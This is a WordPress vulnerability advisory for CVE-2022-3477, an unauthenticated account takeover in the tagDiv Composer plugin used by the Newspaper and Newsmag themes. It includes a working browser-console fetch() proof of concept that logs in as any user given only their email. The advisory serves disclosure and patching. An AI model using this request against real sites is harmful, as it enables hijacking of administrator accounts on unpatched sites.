WordPress Plugin Vulnerabilities

tagDiv Composer < 3.5 - Unauthenticated Account Takeover

Description

The plugin, required by the themes, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=td_ajax_fb_login_user&user[email]=admin@site.com',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Then refresh the page to be logged in as the user with the admin@site.com email address

Affects Plugins

Plugin icon
td-composer
Fixed in 3.5

Affects Themes

Newspaper
Fixed in 12.1
Newsmag
Fixed in 5.2.2

References

CVE
CVE-2022-3477

Classification

Type
AUTHBYPASS
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
Truoc Phan
Submitter
Truoc Phan from Techlab Corporation
Submitter website
https://www.facebook.com/292706121240740
Submitter twitter
truocphan
Verified
Yes
WPVDB ID
993a95d2-6fce-48de-ae17-06ce2db829ef

Timeline

Publicly Published
2022-10-24 (about 1 years ago)
Added
2022-10-24 (about 1 years ago)
Last Updated
2022-10-24 (about 1 years ago)

Other

Published
Title
Published
2024-03-22
Title
Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder < 1.15.23 - Sensitive Information Exposure
Published
2016-09-19
Title
Order Export Import for WooCommerce 1.0.8 - Order Information Disclosure
Published
2020-02-19
Title
Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download
Published
2015-03-04
Title
Ya'aburnee 1.0.7 - Privilage Escalation
Published
2023-07-18
Title
OAuth Single Sign On – SSO (OAuth Client) < 6.23.4 - Improper Authentication